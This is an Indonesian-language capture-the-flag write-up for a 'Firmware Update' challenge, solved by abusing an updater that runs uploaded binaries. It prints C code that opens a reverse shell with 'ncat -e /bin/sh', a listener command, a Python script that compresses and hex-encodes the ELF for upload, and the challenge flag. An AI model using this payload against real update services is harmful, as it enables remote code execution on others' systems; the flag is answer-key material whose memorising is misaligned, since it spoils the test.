# Firmware Update

## Deskripsi
    
    arsalan OS, adalah sistem oprasi buatan goendaer tech dimana adanya bug 
    yang dapat dimanfaatkan untuk melakukan update firmware

## Solusi 
pada soal ini peserta dituntut untuk melakukan analisa source code pada `updater`
untuk dapat menyelesaikan soal ini, peserta dapat membuat file ELF dimana elf tersebut
melakukan back connect atau setidaknya dapat menampilkan flag lalu compile
`gcc test.c -o test`, sebagai contoh:

    #include <stdio.h>
    void main(){
        system(" ncat -e /bin/sh localhost 4444");
    }

lakukan listen connection menggunakan `ncat`

    ncat -lvvp 4444

lalu buat file untuk mengirim data binary tersebut ke server, sesuaikan dengan yang ada
pada `updater.py`: 

    import zlib
    file = open('test' , 'rb')
    data = file.read()
    x = zlib.compress(data)
    x = x.encode("hex")

    print x

lalu jalankan python test | nc `<ip> <port>`
FLAG: hackfest{r3m0te_c0d3_execution}